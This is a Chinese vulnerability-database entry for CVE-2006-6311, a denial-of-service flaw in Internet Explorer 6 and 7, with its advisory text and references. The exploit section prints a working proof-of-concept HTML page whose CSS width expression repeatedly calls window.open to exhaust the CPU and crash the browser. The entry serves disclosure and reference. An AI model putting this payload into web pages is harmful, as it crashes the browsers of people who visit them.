Internet Explorer CSS畸形宽度单元标记拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111723 漏洞类型 其他
发布时间 2006-12-06 更新时间 2006-12-07
CVE编号 CVE-2006-6311 CNNVD-ID CNNVD-200612-102
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29236
https://cxsecurity.com/issue/WLB-2006120040
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-102
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer在处理畸形的HTML标记时存在拒绝服务漏洞,远程攻击者可能利用此漏洞导致用户机器不可用。如果用户使用IE访问了设置有特制CSS宽度单元的WEB页面的话,就会导致iexplore.exe耗尽100%的CPU资源。
|漏洞EXP
source: http://www.securityfocus.com/bid/21466/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

This issue is triggered when an attacker entices a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected.

<html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html>
|参考资料

来源:BUGTRAQ
名称:20061206Re:InternetExplorer6CSS"expression"DenialofServiceExploit(P.o.C.)
链接:http://www.securityfocus.com/archive/1/archive/1/453643/100/0/threaded
来源:BUGTRAQ
名称:20061206InternetExplorer6.CSSExpressionDenialofService(P.o.C.)
链接:http://www.securityfocus.com/archive/1/archive/1/453642/100/0/threaded
来源:BID
名称:21466
链接:http://www.securityfocus.com/bid/21466
来源:BUGTRAQ
名称:20061207Re:InternetExplorer6CSS"expression"DenialofServiceExploit(P.o.C.)
链接:http://www.securityfocus.com/archive/1/archive/1/453772/100/0/threaded
来源:OSVDB
名称:31326
链接:http://www.osvdb.org/31326
来源:SREASON
名称:1968
链接:http://securityreason.com/securityalert/1968